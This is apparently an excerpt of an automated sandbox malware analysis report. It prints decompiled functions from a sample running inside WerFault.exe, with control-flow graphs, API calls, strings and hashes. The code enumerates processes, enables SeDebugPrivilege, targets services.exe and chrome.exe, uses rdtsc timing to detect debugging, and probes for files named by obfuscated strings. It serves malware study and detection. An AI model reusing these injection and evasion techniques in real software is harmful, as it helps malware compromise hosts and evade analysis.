                        0x0286e0eb
                        0x0286e0f0
                        0x0286e0ff
                        0x0286e109
                        0x0286e10b
                        0x0286e183
                        0x0286e18d
                        0x0286e192
                        0x0286e194
                        0x00000000
                        0x00000000
                        0x0286e19a
                        0x0286e1a5
                        0x0286e1af
                        0x0286e1b1
                        0x0286e201
                        0x0286e201
                        0x0286e204
                        0x0286e207
                        0x0286e217
                        0x0286e227
                        0x0286e22c
                        0x0286e22e
                        0x0286e235
                        0x0286e23b
                        0x0286e23d
                        0x0286e24a
                        0x0286e24a
                        0x0286e252
                        0x0286e252
                        0x0286e23d
                        0x0286e22e
                        0x0286e258
                        0x0286e25f
                        0x0286e263
                        0x0286e263
                        0x0286e26b
                        0x0286e26c
                        0x0286e271
                        0x0286e275
                        0x0286e279
                        0x0286e27a
                        0x0286e27a
                        0x0286e27f
                        0x0286e285
                        0x0286e289
                        0x0286e290
                        0x0286e295
                        0x0286e297
                        0x0286e2a0
                        0x0286e2ac
                        0x0286e2b1
                        0x0286e2b1
                        0x0286e297
                        0x0286e2b7
                        0x0286e2bb
                        0x0286e39a
                        0x0286e39a
                        0x0286e39a
                        0x00000000
                        0x0286e2c1
                        0x0286e2c6
                        0x0286e2cb
                        0x0286e2cd
                        0x00000000
                        0x00000000
                        0x0286e2d3
                        0x0286e2d5
                        0x0286e2d8
                        0x0286e2ea
                        0x0286e2f0
                        0x0286e2f2
                        0x0286e2f5
                        0x0286e2f8
                        0x0286e30a
                        0x0286e30a
                        0x0286e2f8
                        0x0286e315
                        0x0286e31a
                        0x0286e31f
                        0x0286e32b
                        0x0286e32e
                        0x0286e331
                        0x0286e33b
                        0x0286e33b
                        0x0286e340
                        0x0286e342
                        0x00000000
                        0x00000000
                        0x0286e357
                        0x0286e359
                        0x0286e35b
                        0x0286e360
                        0x0286e362
                        0x0286e364
                        0x0286e366
                        0x0286e36c
                        0x0286e36c
                        0x0286e362
                        0x0286e38a
                        0x0286e38d
                        0x0286e392
                        0x0286e39c
                        0x0286e39c
                        0x0286e3a0
                        0x0286e3a2
                        0x0286e3a2
                        0x0286e3ac
                        0x0286e3b1
                        0x0286e3ba
                        0x0286e3bf
                        0x0286e3c1
                        0x0286e3d2
                        0x0286e3d2
                        0x0286e3d2
                        0x0286e3d2
                        0x0286e3d9
                        0x00000000
                        0x0286e3c3
                        0x0286e3c3
                        0x0286e3c8
                        0x0286e3ca
                        0x00000000
                        0x00000000
                        0x0286e3cc
                        0x0286e3d0
                        0x0286e3dc
                        0x0286e3dc
                        0x0286e3df
                        0x0286e3e1
                        0x0286e3e3
                        0x0286e3e6
                        0x0286e3e8
                        0x0286e3ea
                        0x0286e3ea
                        0x0286e3eb
                        0x0286e3f6
                        0x0286e3fd
                        0x0286e402
                        0x0286e402
                        0x0286e408
                        0x0286e408
                        0x0286e3e8
                        0x0286e40b
                        0x0286e40e
                        0x0286e410
                        0x0286e414
                        0x0286e416
                        0x0286e41b
                        0x0286e41b
                        0x0286e414
                        0x0286e421
                        0x0286e427
                        0x0286e431
                        0x0286e431
                        0x0286e436
                        0x00000000
                        0x0286e429
                        0x0286e429
                        0x0286e42f
                        0x0286e43c
                        0x0286e43c
                        0x0286e440
                        0x0286e447
                        0x0286e44c
                        0x0286e44e
                        0x0286e450
                        0x0286e454
                        0x0286e456
                        0x0286e45b
                        0x0286e45b
                        0x0286e454
                        0x0286e44e
                        0x0286e461
                        0x0286e465
                        0x0286e467
                        0x0286e46c
                        0x0286e46c
                        0x0286e47a
                        0x0286e480
                        0x0286e485
                        0x0286e487
                        0x00000000
                        0x0286e48d
                        0x0286e48d
                        0x0286e498
                        0x0286e49d
                        0x0286e49f
                        0x0286e4a8
                        0x0286e4ac
                        0x0286e4ae
                        0x0286e4ae
                        0x0286e4a1
                        0x0286e4a1
                        0x0286e4a1
                        0x0286e4b3
                        0x0286e4bd
                        0x0286e4c7
                        0x0286e4c9
                        0x0286e4d5
                        0x0286e4d5
                        0x0286e4c9
                        0x0286e4da
                        0x0286e4df
                        0x0286e4e5
                        0x0286e4f2
                        0x0286e4f2
                        0x00000000
                        0x0286e4f6
                        0x0286e487
                        0x00000000
                        0x0286e42f
                        0x0286e427
                        0x00000000
                        0x0286e3d0
                        0x0286e333
                        0x0286e333
                        0x0286e335
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0286e335
                        0x0286e331
                        0x0286e2bb
                        0x0286e1b3
                        0x0286e1b7
                        0x00000000
                        0x00000000
                        0x0286e1b9
                        0x0286e1bf
                        0x0286e1c1
                        0x00000000
                        0x00000000
                        0x0286e1c7
                        0x0286e1cd
                        0x0286e1cf
                        0x0286e1f5
                        0x0286e1fb
                        0x0286e1fb
                        0x00000000
                        0x0286e1fb
                        0x0286e1d1
                        0x0286e1d7
                        0x0286e1da
                        0x00000000
                        0x00000000
                        0x0286e1dc
                        0x0286e1dd
                        0x00000000
                        0x0286e1dd
                        0x0286e10d
                        0x0286e112
                        0x0286e114
                        0x00000000
                        0x00000000
                        0x0286e116
                        0x0286e11b
                        0x0286e120
                        0x0286e123
                        0x0286e1e5
                        0x0286e1e9
                        0x00000000
                        0x0286e1e9
                        0x0286e129
                        0x0286e12e
                        0x0286e131
                        0x00000000
                        0x00000000
                        0x0286e137
                        0x0286e13c
                        0x0286e13e
                        0x0286e14b
                        0x0286e14b
                        0x0286e151
                        0x0286e153
                        0x0286e155
                        0x0286e15b
                        0x0286e15b
                        0x0286e15b
                        0x0286e15d
                        0x0286e15d
                        0x0286e15f
                        0x0286e161
                        0x0286e163
                        0x00000000
                        0x00000000
                        0x0286e165
                        0x0286e165
                        0x0286e16b
                        0x0286e16d
                        0x0286e16d
                        0x0286e179
                        0x0286e17d
                        0x0286e17d
                        0x00000000
                        0x0286e16b
                        0x0286e140
                        0x0286e145
                        0x0286e147
                        0x0286e149
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0286e149
                        0x0286e0d8
                        0x0286e0ad
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: LSF$SeBackupPrivilege$SeRestorePrivilege$comctl32.dll
                        • API String ID: 0-2627624081
                        • Opcode ID: c611535458f8cfc957fd61230ea4c1442d493154c4290b3d9abb5f77c0bdb677
                        • Instruction ID: a701fc088f01726a83498a558b0e45e93fe6cd4b226801f9b2af95167d2eaf91
                        • Opcode Fuzzy Hash: c611535458f8cfc957fd61230ea4c1442d493154c4290b3d9abb5f77c0bdb677
                        • Instruction Fuzzy Hash: D2C1583CA402449BDB28ABB8D44CFB97767AF15308F1C8555EA88DB6C2CB71C492CF56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028802BF Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 154processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 951 28802bf-28802f6 call 28614db 954 28802f8-28802ff 951->954 955 2880347 951->955 954->955 956 2880301-2880313 CreateToolhelp32Snapshot 954->956 957 2880349-288034f 955->957 956->955 958 2880315-288031e 956->958 959 288032c-288033e Process32FirstW 958->959 960 2880320-2880327 call 2863d40 958->960 962 2880350-2880356 959->962 963 2880340 959->963 960->959 964 288035c-288037a 962->964 965 2880480-28804a4 call 28614db Process32NextW 962->965 963->955 964->965 967 2880380-2880385 964->967 965->962 972 28804aa-28804b8 965->972 969 28803a5-28803a9 967->969 970 2880387-2880399 967->970 969->965 971 28803af-28803ba call 287fd1b 969->971 970->969 975 288039b-288039f 970->975 979 28803bc-28803c1 971->979 980 28803c7-28803d2 971->980 972->957 975->969 978 28803a1 975->978 978->969 979->965 979->980 981 28803f2-28803f9 980->981 982 28803d4-28803e7 980->982 983 28803fb-2880407 call 286406c 981->983 984 2880414-2880426 981->984 982->965 989 28803ed 982->989 983->984 990 2880409-2880412 call 2865257 983->990 991 2880428-288042e call 28739f1 984->991 992 2880433-2880446 call 288ad40 984->992 989->981 990->965 991->992 998 2880448 992->998 999 288044a-288044c 992->999 998->999 999->965 1000 288044e-2880473 call 2881aaa 999->1000 1002 2880478-288047a 1000->1002 1002->965 1003 288047c 1002->1003 1003->965
                        C-Code - Quality: 55%
                        			E028802BF(void* __ecx, void* __edx) {
				char _v536;
				intOrPtr _v548;
				char _v564;
				char _v568;
				char _v572;
				void* _v584;
				intOrPtr _v586;
				intOrPtr _v590;
				signed int _v592;
				char _v596;
				signed int _v600;
				int _v604;
				int _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				void* __esi;
				intOrPtr _t60;
				intOrPtr _t61;
				void* _t62;
				int _t65;
				intOrPtr _t66;
				int _t70;
				intOrPtr _t73;
				void* _t78;
				short _t79;
				void* _t82;
				void* _t92;
				void* _t99;
				int _t101;
				intOrPtr _t103;
				void* _t106;
				intOrPtr _t107;

				_t99 = __edx;
				_t98 = __ecx;
				_t101 = 0;
				_v604 = 0;
				_v608 = 0;
				_v600 = 0;
				E028614DB(__ecx,  &_v564, 0, 0x22c);
				_t60 =  *0x289f2e8;
				if(( *(_t60 + 0xa) & 0x00000040) != 0 || ( *(_t60 + 0x16) & 0x00000100) != 0) {
					L7:
					_t61 = 0;
					goto L8;
				} else {
					_t62 = CreateToolhelp32Snapshot(2, 0); // executed
					_t106 = _t62;
					_v592 = _t106;
					if(_t106 == 0xffffffff) {
						goto L7;
					} else {
						if(( *( *0x289f2e8 + 0xa) & 0x00000020) != 0) {
							E02863D40("SeDebugPrivilege", 1); // executed
						}
						_push( &_v568);
						_v568 = 0x22c;
						_t65 = Process32FirstW(_t106); // executed
						if(_t65 != 0) {
							do {
								_t66 = _v564;
								if(_t66 == _t101) {
									goto L31;
								}
								_v600 = _v600 & 0x00000000;
								_v592 = _v592 & 0x00000000;
								_v616 = _v616 + 1;
								_t103 = _v548;
								_t107 = _t66;
								_v604 = _t107;
								if(_t66 ==  *0x289fdb4) {
									goto L31;
								}
								if(_v616 < 0xc) {
									_t92 =  *0x289f69c( &_v536, L"services.exe");
									if(_t92 == 0 && _v620 == _t92) {
										_v620 = _t107;
									}
								}
								if(_t103 != _v612 && (E0287FD1B( &_v536) != 1 || _v616 >= 0x14)) {
									_t73 =  *0x289f2e8;
									if(_t103 !=  *((intOrPtr*)(_t73 + 0x162))) {
										L21:
										if(( *(_t73 + 0x16) & 0x00001000) == 0 || E0286406C( &_v536) != 1) {
											_push(L"chrome.exe");
											_push( &_v536);
											if( *0x289f69c() == 0) {
												E028739F1(_t103,  &_v600);
											}
											_t78 = E0288AD40(_v612, _t98, _t99,  &_v608);
											if(_v612 == 1) {
												_t78 = 1;
											}
											if(_t78 == 0) {
												_t79 = 0xe;
												_v596 = _t79;
												_v590 = 0;
												_v586 = _t103;
												_t82 = E02881AAA(_t99, _v612,  &_v596, 0,  *0x28a0658, 1, 0); // executed
												if(_t82 == 0) {
													_v616 = _v616 + 1;
												}
											}
										} else {
											E02865257(_v564);
										}
										goto L31;
									}
									_push(_t73 + 0x2376);
									_push( &_v536);
									if( *0x289f69c() == 0) {
										goto L31;
									}
									_t73 =  *0x289f2e8;
									goto L21;
								}
								L31:
								_t101 = 0;
								E028614DB(_t98,  &_v572, 0, 0x22c);
								_v584 = 0x22c;
								_t70 = Process32NextW(_v608,  &_v584); // executed
							} while (_t70 == 1);
							 *0x289f824(_v600);
							_t61 = _v616;
							L8:
							return _t61;
						} else {
							 *0x289f824(_t106);
							goto L7;
						}
					}
				}
			}




































                        0x028802bf
                        0x028802bf
                        0x028802ce
                        0x028802dc
                        0x028802e0
                        0x028802e4
                        0x028802e8
                        0x028802ed
                        0x028802f6
                        0x02880347
                        0x02880347
                        0x00000000
                        0x02880301
                        0x02880304
                        0x0288030a
                        0x0288030c
                        0x02880313
                        0x00000000
                        0x02880315
                        0x0288031e
                        0x02880327
                        0x02880327
                        0x02880330
                        0x02880332
                        0x02880336
                        0x0288033e
                        0x02880350
                        0x02880350
                        0x02880356
                        0x00000000
                        0x00000000
                        0x0288035c
                        0x02880361
                        0x02880366
                        0x0288036a
                        0x0288036e
                        0x02880370
                        0x0288037a
                        0x00000000
                        0x00000000
                        0x02880385
                        0x02880391
                        0x02880399
                        0x028803a1
                        0x028803a1
                        0x02880399
                        0x028803a9
                        0x028803c7
                        0x028803d2
                        0x028803f2
                        0x028803f9
                        0x02880414
                        0x0288041d
                        0x02880426
                        0x0288042e
                        0x0288042e
                        0x0288043c
                        0x02880446
                        0x02880448
                        0x02880448
                        0x0288044c
                        0x02880450
                        0x02880451
                        0x02880461
                        0x0288046f
                        0x02880473
                        0x0288047a
                        0x0288047c
                        0x0288047c
                        0x0288047a
                        0x02880409
                        0x0288040d
                        0x0288040d
                        0x00000000
                        0x028803f9
                        0x028803d9
                        0x028803de
                        0x028803e7
                        0x00000000
                        0x00000000
                        0x028803ed
                        0x00000000
                        0x028803ed
                        0x02880480
                        0x02880481
                        0x02880489
                        0x02880497
                        0x0288049b
                        0x028804a1
                        0x028804ae
                        0x028804b4
                        0x02880349
                        0x0288034f
                        0x02880340
                        0x02880341
                        0x00000000
                        0x02880341
                        0x0288033e
                        0x02880313

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,0000022C,00000000,?,00000001), ref: 02880304
                        • Process32FirstW.KERNEL32(00000000,?), ref: 02880336
                        • Process32NextW.KERNEL32(?,?,?,00000000,0000022C), ref: 0288049B
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                        • String ID: SeDebugPrivilege$chrome.exe$services.exe
                        • API String ID: 1238713047-3113674346
                        • Opcode ID: 94e9c23b8938577c59c2e9d7d60f25de4561bf59414f0ff46f1d4d77f596962f
                        • Instruction ID: 31ee9ee068923fb8cf91f3e213e5233b5e7f57dce6e099c2ca863e20ea2bea02
                        • Opcode Fuzzy Hash: 94e9c23b8938577c59c2e9d7d60f25de4561bf59414f0ff46f1d4d77f596962f
                        • Instruction Fuzzy Hash: 82518A7D948300AFD720EF25D848B6BB7E9FF84319F084919F988D2291D334D5188F92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02884963 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 204sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1228 2884963-2884971 call 286e5d6 1231 2884973 1228->1231 1232 2884975-2884999 call 2884c84 1228->1232 1231->1232 1236 288499b-28849a7 RtlAddVectoredExceptionHandler 1232->1236 1237 28849ad-28849c2 call 2865774 1232->1237 1236->1237 1240 28849e8-28849f0 call 286e06b 1237->1240 1241 28849c4-28849c6 1237->1241 1247 28849f9-2884a00 1240->1247 1248 28849f2 1240->1248 1242 28849c8-28849d4 call 286d774 1241->1242 1243 28849e1 1241->1243 1242->1243 1252 28849d6-28849df 1242->1252 1243->1240 1250 2884a19 1247->1250 1251 2884a02-2884a13 call 286d774 1247->1251 1248->1247 1254 2884a1b-2884a2f call 286d774 1250->1254 1251->1250 1258 2884a15-2884a17 1251->1258 1252->1240 1260 2884a31 call 2865b4a 1254->1260 1261 2884a36-2884a6d call 286fc3e call 286d774 1254->1261 1258->1254 1260->1261 1268 2884a6f-2884a82 call 288383b 1261->1268 1269 2884a87-2884a8f 1261->1269 1268->1269 1271 2884ab1-2884ac8 call 2865e00 1269->1271 1272 2884a91-2884aa8 call 2865e00 1269->1272 1278 2884aca 1271->1278 1279 2884ad1-2884aef call 287fd11 Sleep call 286d774 1271->1279 1272->1271 1277 2884aaa 1272->1277 1277->1271 1278->1279 1284 2884af1 call 287f56d 1279->1284 1285 2884af6-2884b0d call 2865e00 1279->1285 1284->1285 1289 2884b0f 1285->1289 1290 2884b16-2884b39 Sleep call 2884bca call 2884cbc call 286d774 1285->1290 1289->1290 1297 2884b3b-2884b57 1290->1297 1298 2884b65-2884b68 1290->1298 1303 2884b59 call 2863fcd 1297->1303 1304 2884b5e call 28707d7 1297->1304 1299 2884b6a-2884b7a 1298->1299 1300 2884bb3-2884bbb call 286e4ff 1298->1300 1307 2884b7c-2884b7f 1299->1307 1308 2884b81-2884b8d call 286319b 1299->1308 1309 2884bbd 1300->1309 1310 2884bc4-2884bc9 1300->1310 1303->1304 1315 2884b63 1304->1315 1313 2884b8f 1307->1313 1308->1313 1309->1310 1317 2884b9b-2884bab 1313->1317 1318 2884b91-2884b99 1313->1318 1315->1300 1317->1300 1321 2884bad-2884bae call 2880a42 1317->1321 1318->1299 1321->1300
                        C-Code - Quality: 52%
                        			E02884963(intOrPtr __eax, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _v5;
				signed char _v9;
				char _v12;
				void* __ebp;
				intOrPtr _t29;
				void* _t33;
				intOrPtr _t34;
				void* _t38;
				void* _t47;
				void* _t51;
				void* _t53;
				signed int _t62;
				void* _t64;
				intOrPtr _t67;
				void* _t74;
				void* _t88;
				void* _t96;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t104;

				_t99 = __edx;
				_t96 = __ecx;
				_t104 = __eax;
				if(E0286E5D6(__eax) == 0) {
					_t104 = 0;
				}
				E02884C84(_t96);
				_push("mscoree.dll");
				 *0x28a0050 = 0;
				 *0x28a0048 = 0;
				 *0x28a004c = 0;
				if( *0x289f8cc() == 0) {
					 *0x28a0044 = 0; // executed
					 *0x289f724(0, E028758A7); // executed
				}
				_t29 = 2;
				 *0x28a0044 = _t29;
				if(E02865774(_t104) != 0) {
					L9:
					_t33 = E0286E06B(0x28a0044, _t99, _t119, _t104); // executed
					if(_t33 == 0) {
						 *0x289f6fc(0);
					}
					if(( *0x289fdc8 & 0x00000080) == 0 || E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) != 0) {
						_push(3);
					} else {
						_push(4);
					}
					_pop(_t34);
					 *0x28a0044 = _t34;
					_t38 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
					_t123 = _t38 - 1;
					if(_t38 == 1) {
						E02865B4A(0x28a0044, _t123); // executed
					}
					_pop(_t105);
					_pop(_t93);
					_push(0x28a0044);
					_push(0x28a0044);
					_v9 =  *( *0x289f2e8 + 0xa) >> 0x00000001 & 0x00000001;
					E0286FC3E(0x28a0044, _t123);
					_t98 =  *0x289f2e8;
					if(E0286D774( *(_t98 + 4) & 0x0000ffff) == 1) {
						E0288383B(_t98,  *(_t98 + 0xa) >> 0x00000005 & 1); // executed
					}
					if( *0x28a0654 != 0) {
						_t74 = E02865E00(E0287E210, 0, 0, 0x1b, 0,  &_v12, 0x50);
						if(_t74 != 0) {
							 *0x289f824(_t74);
						}
					}
					_t47 = E02865E00(E028800ED, 0, 0, 0x18, 0,  &_v12, 0x18); // executed
					if(_t47 != 0) {
						 *0x289f824(_t47);
					}
					E0287FD11();
					Sleep(0x64); // executed
					_t51 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
					_t129 = _t51 - 1;
					if(_t51 == 1) {
						E0287F56D(_t98, _t129); // executed
					}
					_t53 = E02865E00(E02889FE6, 0, 0, 4, 0,  &_v12, 0x18); // executed
					_t130 = _t53;
					if(_t53 != 0) {
						 *0x289f824(_t53);
					}
					Sleep(0x64); // executed
					E02884BCA(_t98, _t130);
					E02884CBC();
					if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) != 1) {
						__eflags = _v5 - 1;
						if(_v5 != 1) {
							goto L41;
						} else {
							goto L34;
						}
						while(1) {
							L34:
							_t62 =  *0x289f8a4( *0x289fdb0, 0x3c);
							__eflags = _t62;
							if(__eflags == 0) {
								__eflags = E0286319B(__eflags, "ULiFS", 0x43) - 1;
							} else {
								__eflags = _t62 - 0xffffffff;
							}
							if(__eflags == 0) {
								break;
							}
							 *0x289f90c(0x3c);
						}
						_t64 =  *0x289f848();
						_t98 =  *0x289f2e8;
						__eflags =  *(_t98 + 0xa) & 0x00000002;
						if(( *(_t98 + 0xa) & 0x00000002) != 0) {
							E02880A42(_t64);
						}
						goto L41;
					} else {
						 *0x289f8b0(0x289fff8, 0xfa0);
						_t67 =  *0x289f2e8;
						_t132 =  *(_t67 + 0x16) & 0x00001000;
						if(( *(_t67 + 0x16) & 0x00001000) != 0) {
							E02863FCD(); // executed
						}
						E028707D7(_t132); // executed
						L41:
						E0286E4FF(_t98);
						if(_v5 == 1) {
							L02887454(0xfffffffe);
						}
						return 1;
					}
				} else {
					if(_t104 == 0) {
						L8:
						 *0x289f6fc(0);
						goto L9;
					}
					_t88 = E0286D774( *(_t104 + 4) & 0x0000ffff);
					_t119 = _t88 - 1;
					if(_t88 == 1) {
						goto L8;
					}
					 *0x289f5dc(0xfffffffe, 0);
					goto L9;
				}
			}























                        0x02884963
                        0x02884963
                        0x02884966
                        0x02884971
                        0x02884973
                        0x02884973
                        0x02884975
                        0x0288497a
                        0x0288497f
                        0x02884985
                        0x0288498b
                        0x02884999
                        0x028849a1
                        0x028849a7
                        0x028849a7
                        0x028849b4
                        0x028849b7
                        0x028849c2
                        0x028849e8
                        0x028849e9
                        0x028849f0
                        0x028849f3
                        0x028849f3
                        0x02884a00
                        0x02884a19
                        0x02884a15
                        0x02884a15
                        0x02884a15
                        0x02884a1b
                        0x02884a1c
                        0x02884a28
                        0x02884a2d
                        0x02884a2f
                        0x02884a31
                        0x02884a31
                        0x02884a37
                        0x02884a38
                        0x02884a41
                        0x02884a42
                        0x02884a53
                        0x02884a56
                        0x02884a5b
                        0x02884a6d
                        0x02884a82
                        0x02884a82
                        0x02884a8f
                        0x02884aa1
                        0x02884aa8
                        0x02884aab
                        0x02884aab
                        0x02884aa8
                        0x02884ac1
                        0x02884ac8
                        0x02884acb
                        0x02884acb
                        0x02884ad1
                        0x02884ad8
                        0x02884ae8
                        0x02884aed
                        0x02884aef
                        0x02884af1
                        0x02884af1
                        0x02884b06
                        0x02884b0b
                        0x02884b0d
                        0x02884b10
                        0x02884b10
                        0x02884b18
                        0x02884b1e
                        0x02884b23
                        0x02884b39
                        0x02884b65
                        0x02884b68
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02884b6a
                        0x02884b6a
                        0x02884b72
                        0x02884b78
                        0x02884b7a
                        0x02884b8d
                        0x02884b7c
                        0x02884b7c
                        0x02884b7c
                        0x02884b8f
                        0x00000000
                        0x00000000
                        0x02884b93
                        0x02884b93
                        0x02884b9b
                        0x02884ba1
                        0x02884ba7
                        0x02884bab
                        0x02884bae
                        0x02884bae
                        0x00000000
                        0x02884b3b
                        0x02884b45
                        0x02884b4b
                        0x02884b50
                        0x02884b57
                        0x02884b59
                        0x02884b59
                        0x02884b5e
                        0x02884bb3
                        0x02884bb3
                        0x02884bbb
                        0x02884bbf
                        0x02884bbf
                        0x02884bc9
                        0x02884bc9
                        0x028849c4
                        0x028849c6
                        0x028849e1
                        0x028849e2
                        0x00000000
                        0x028849e2
                        0x028849cd
                        0x028849d2
                        0x028849d4
                        0x00000000
                        0x00000000
                        0x028849d9
                        0x00000000
                        0x028849d9

                        APIs
                        • RtlAddVectoredExceptionHandler.NTDLL(00000000,028758A7,?,?,?,02884925,?,?,?,0288488D,00000000), ref: 028849A7
                        • Sleep.KERNEL32(00000064,028800ED,00000000,00000000,00000018,00000000,?,00000018,?,?,?,?,?,?,?), ref: 02884AD8
                        • Sleep.KERNEL32(00000064,02889FE6,00000000,00000000,00000004,00000000,?,00000018,?,?,?,?,?,?,?,02884925), ref: 02884B18
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$ExceptionHandlerVectored
                        • String ID: ULiFS$mscoree.dll
                        • API String ID: 4094958979-3325193812
                        • Opcode ID: 787944aa0af1963232a6bde734cd4ddcfe20db685dfd45b4d97e057f237225fd
                        • Instruction ID: 8472de0e6cdc567e4bb893ea9753dc45c4fb99276c2e1a3c4c6ef1aca9d45f17
                        • Opcode Fuzzy Hash: 787944aa0af1963232a6bde734cd4ddcfe20db685dfd45b4d97e057f237225fd
                        • Instruction Fuzzy Hash: D8514A7E9C03016AEA30BBE8AC4DFBA379DAF15714B180901F749DB5C1CB358461DBA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02864592 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E02864592(intOrPtr __eax, void* __ecx) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v76;
				void* _t29;
				void* _t31;
				void* _t47;

				_v12 = 0;
				_v8 = 0;
				asm("rdtsc");
				_v12 = __eax;
				asm("rdtsc");
				_v8 = __eax;
				if(_v8 - _v12 + 0xfffffe6f > 0x257e) {
					E028614DB(__ecx,  &_v76, 0, 0x40);
					 *0x289f6a8( &_v76, "JJ8J^QPE", _t47);
					E02862485( *0x289f6b8( &_v76),  &_v76,  &_v76);
					_t29 = CreateFileA( &_v76, 1, 1, 0, 4, 0, 0); // executed
					if(_t29 != 0xffffffff) {
						L4:
						 *0x289f824(_t29);
						_t31 = 1;
						L6:
						return _t31;
					}
					E028614DB( &_v76,  &_v76, 0, 0x40);
					 *0x289f6a8( &_v76, "JJ8J@TynQcseb");
					E02862485( *0x289f6b8( &_v76),  &_v76,  &_v76);
					_t29 = CreateFileA( &_v76, 1, 1, 0, 4, 0, 0); // executed
					if(_t29 == 0xffffffff) {
						_t31 = 0;
						goto L6;
					}
					goto L4;
				}
				return 1;
			}









                        0x0286459b
                        0x0286459e
                        0x028645a1
                        0x028645a3
                        0x028645a6
                        0x028645a8
                        0x028645bb
                        0x028645cd
                        0x028645db
                        0x028645f0
                        0x02864603
                        0x0286460c
                        0x02864653
                        0x02864654
                        0x0286465a
                        0x02864660
                        0x00000000
                        0x02864660
                        0x02864615
                        0x02864623
                        0x02864638
                        0x02864648
                        0x02864651
                        0x0286465e
                        0x00000000
                        0x0286465e
                        0x00000000
                        0x02864651
                        0x00000000

                        APIs
                        • CreateFileA.KERNEL32(?,00000001,00000001,00000000,00000004,00000000,00000000), ref: 02864603
                        • CreateFileA.KERNEL32(?,00000001,00000001,00000000,00000004,00000000,00000000), ref: 02864648
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: JJ8J@TynQcseb$JJ8J^QPE
                        • API String ID: 823142352-2417344106
                        • Opcode ID: 2579aae61a4ae88dfaa338f4d754c49affae0c1627aa10cad59fa1f6b984e2d2
                        • Instruction ID: 4354f60c7ad90d28222c1bd1806d2f2a6704d1b80da9a434513691de23d10653
                        • Opcode Fuzzy Hash: 2579aae61a4ae88dfaa338f4d754c49affae0c1627aa10cad59fa1f6b984e2d2
                        • Instruction Fuzzy Hash: 0B2178B9D40218BACB20DBB4DC4CEDF7BBDEF85624F084911F606E2584D6349286CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286531A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E0286531A(void* __ecx, intOrPtr* __esi) {
				short _v8;
				char _v12;
				struct _SYSTEM_INFO _v48;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				intOrPtr _v256;
				signed short _v260;
				signed int _v264;
				char _v268;
				char _v524;
				char _v788;
				void* _t60;
				short _t68;
				intOrPtr* _t69;
				void* _t70;

				_t69 = __esi;
				if(__esi == 0 ||  *__esi != 0x160) {
					return 0;
				} else {
					_v12 = 0xff;
					E028614DB(__ecx,  &_v524, 0, 0x100);
					E028614DB(__ecx,  &_v48, 0, 0x24);
					GetSystemInfo( &_v48); // executed
					 *0x289f7fc( &_v116);
					_v268 = 0x94;
					 *0x289f80c( &_v268);
					 *0x289f810(0,  &_v524,  &_v12);
					_t66 = _v264 & 0x0000ffff;
					 *((intOrPtr*)(__esi + 8)) = _v108;
					 *((intOrPtr*)(__esi + 0xc)) = _v100;
					 *(__esi + 0x14) = (_v260 & 0x0000ffff) << 0x00000010 | _v264 & 0x0000ffff;
